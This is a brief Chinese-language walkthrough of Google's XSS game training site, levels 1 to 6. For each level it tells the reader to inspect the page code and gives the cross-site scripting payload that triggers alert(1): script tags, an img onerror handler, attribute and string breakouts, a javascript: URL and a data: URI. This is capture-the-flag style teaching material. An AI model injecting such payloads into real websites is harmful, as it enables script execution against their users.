XSSgame

链接地址：https://xss-game.appspot.com/

 

(1)level1

 查看页面代码

输入

" <script>alert(1);</script> " 或直接 <script>alert(1)</script>

 

 

(2)level2

 输入123后查看页面代码

 

 

 

输入

<img src=# onerror=alert(1)>

 

 

 

(3)level3

 选择某图片对应着数字

 

 查看页面代码

 

 对num进行控制，插入js代码

在#后输入

3.jpg' /> <script>alert(1)</script>

 

 

 

(4)level4

 

 查看页面代码

 

 点击Create timer

 

 此时页面代码

可以在3这个地方进行控制，插入js代码

最初输入

3');" onclick=alert('1

 

 

 对字符进行了编码

直接输入

3');alert('

 

 

(5)level5

 

 查看页面代码

 

 

 

 

 

 

 控制next的值

输入

javascript:alert(1)

  点击Next>>

 

(6)level6

 查看页面代码

 

 #后的值会输出在页面上

输入

data:text/javascript,alert(1)

 data：××××对于一些“小”的数据，可以在网页中直接嵌入，而不是从外部文件载入

 

 

结束